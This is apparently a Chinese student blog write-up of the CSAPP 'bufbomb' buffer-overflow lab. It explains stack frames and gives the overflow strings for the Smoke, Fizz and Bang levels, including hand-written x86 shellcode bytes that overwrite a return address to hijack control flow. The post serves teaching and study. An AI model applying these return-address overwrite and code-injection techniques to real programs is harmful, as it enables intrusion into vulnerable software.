CSAPP:逆向工程【缓冲区溢出攻击】

逆向工程【缓冲区溢出攻击】

任务描述

掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使程序执行我们所期望的过程。

主要方法

溢出的字符将覆盖栈帧上的数据,会覆盖程序调用的返回地址,这赋予了我们控制程序流程的能力。通过构造溢出字符串,程序将“返回”至我们想要的代码上。
CSAPP:逆向工程【缓冲区溢出攻击】
实验包括三个可执行文件:
---| bufbomb为目标程序
---| makecookie可以生成bufbomb需要的输入参数的cookie(也可以在gdb调试时直接读取寄存器获得)
---| sendstring可以将ASCII码转成字符(实验用到了拓展ASCII码)

程序运行时栈帧结构

CSAPP:逆向工程【缓冲区溢出攻击】

Level0:Somke

getbuf函数在test中被调用,当getbuf返回时继续执行第八行:

void test() 
{ 
    int val; 
    volatile int local = 0xdeadbeef; 
    entry_check(3); /* Make sure entered this function properly */ 
    val = getbuf(); 
    /* Check for corrupted stack */ 
    if (local != 0xdeadbeef) { 
        printf("Sabotaged!: the stack has been corrupted\n"); 
    } 
    else if (val == cookie) { 
        ......
    }
}

Bufbomb中一个正常情况下不会被执行的函数:

void smoke() 
{ 
    entry_check(0); /* Make sure entered this function properly */ 
    printf("Smoke!: You called smoke()\n"); 
    validate(0); 
    exit(0); 
}

攻击目标

在getbuf返回时跳到smoke函数执行。

思路

1、通过gdb调试得到我们输入的字符串首地址p/x $ebp-0xc
2、找到函数smoke的地址p/x &smoke
3、用smoke函数的地址覆盖getbuf的返回地址

操作

首先对可执行程序进行反汇编objdump -d bufbomb > bufbomb.s
CSAPP:逆向工程【缓冲区溢出攻击】
CSAPP:逆向工程【缓冲区溢出攻击】
反汇编得到的汇编码中,找到getbuf的代码段,可以看到缓冲区首地址为-0xc(%ebp),%eax
打开gdb调试,在Gets函数执行前设置断点b *0x8048fec
运行程序,输入测试字符:
CSAPP:逆向工程【缓冲区溢出攻击】
得到缓冲区首地址为0xffffb16c
CSAPP:逆向工程【缓冲区溢出攻击】
得到smoke函数入口地址0x8048e20

接下来只需要构造攻击字符串,使得字符串溢出部分覆盖返回地址,达到“返回”到smoke函数的目的。

根据程序运行时的栈帧结构,可以得到返回地址存储在ebp寄存器的后4字节,输入缓冲区大小为0xc+4,最终得到攻击字符串长度应该为0xc+4+4=20字节。
只要输入字符串的最后4字节为smoke函数入口地址即可跳转,前16字节数据可以为任意值,小端模式下攻击字符串如下:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 8e 04 08
将字符串保存到exploit1.txt文件中,使用./sendstring <exploit1.txt> exploit1_raw.txt将ASCII码转为实际字符。
执行程序测试运行结果./bufbomb -t USTCSA < exploit1_raw.txt
CSAPP:逆向工程【缓冲区溢出攻击】

Level1:Fizz

另一函数

void fizz(int val) 
{ 
    entry_check(1); /* Make sure entered this function properly */ 
    if (val == cookie) { 
        printf("Fizz!: You called fizz(0x%x)\n", val); 
        validate(1); 
    } else 
        printf("Misfire: You called fizz(0x%x)\n", val); 
    exit(0); 
}

攻击目标

“返回”到该函数并传送参数cookie

操作

原理与smoke相同,观察栈帧结构可以发现只需要在smoke攻击字串后面再继续覆盖调用栈帧的参数。
CSAPP:逆向工程【缓冲区溢出攻击】
fizz入口地址为0x8048dc0.
与smoke相同,ebp+4为栈帧返回地址。

执行完ret指令后栈顶指针 %esp 会自动增加4以还原栈帧。

在fizz汇编代码段,cmp指令是将存放cookie的变量与%ebp+0x8处的值相比,此时参数地址也就是旧的ebp+4+8。

cookie值通过./makecookie USTCSA获得。

通过以上分析可以得到,fizz攻击的字符串与smoke相比,只需要将ebp之上4个字节的地址覆盖,然后再往上8字节填入cookie参数。

除了fizz的入口地址与cookie参数,其余字节都可以用任意值填充,得到一下攻击字符串。
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 8d 04 08 00 00 00 00 c1 5f d3 11
再使用sendstring获得新的攻击字符,执行程序测试运行结果
CSAPP:逆向工程【缓冲区溢出攻击】

Level2:Bang

第三个函数

int global_value = 0; 
void bang(int val) 
{ 
    entry_check(2); /* Make sure entered this function properly */ 
    if (global_value == cookie) { 
        printf("Bang!: You set global_value to 0x%x\n", global_value); 
        validate(2); 
    } else {
        printf("Misfire: global_value = 0x%x\n", global_value); 
        exit(0); 
    }
}

攻击目标

构造若干条指令,修改全局变量global_val,然后跳转到bang函数
(需要execstack工具解除栈执行限制)

操作

与smoke和fizz不同的是,这里不在是简单的纂改返回地址。因为涉及到修改全局变量,所以需要注入我们自己的代码,然后将返回地址篡改到攻击代码处执行,最后ret到bang函数。

通过前两个实验的分析,已经得知输入缓冲区最大有16字节的空间,而我们注入的代码正好只需要16字节空间。

以下是我们想要添加执行的汇编码:

movl    $0x11d35fc1, 0x804a1dc
push    $0x8048d60
ret

movl指令将我们的cookie(11d35fc1)传递到0x804a1dc(cmp指令对比时的全局变量取值)
push指令将bang函数的入口地址压栈
ret指令返回我们最后压入的bang函数入口,实现跳转的效果
CSAPP:逆向工程【缓冲区溢出攻击】
将我们自己写的汇编码保存,通过gcc将汇编码编译成机器码
gcc -m32 -c bang.s获得bang.o
再将机器码读取
objdump -d bang.o

bang.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   c7 05 dc a1 04 08 c1    movl   $0x11d35fc1,0x804a1dc
   7:   5f d3 11 
   a:   68 60 8d 04 08          push   $0x8048d60
   f:   c3                      ret    

c7 05 dc a1 04 08 c1
5f d3 11
68 60 8d 04 08
c3

获得我们自己想要操作的指令机器码。

只需要在这段字串后再加上缓冲区的首地址,用来覆盖原返回地址,可获得最后的攻击字符串:
c7 05 dc a1 04 08 c1 5f d3 11 68 60 8d 04 08 c3 6c b1 ff ff

使用sendstring获得新的攻击字符,执行程序测试运行结果
CSAPP:逆向工程【缓冲区溢出攻击】
提示运行失败。。。。。。。。。
一直以为是自己那里写错了,折腾了一下午(微笑脸)

出现段错误是因为Linux系统默认开启了栈保护机制,用于阻止缓冲区溢出攻击

上一篇:《大数据技术原理与应用》第二版-第五章NoSQL数据库


下一篇:mysql 使用union(all) + order by 导致排序失效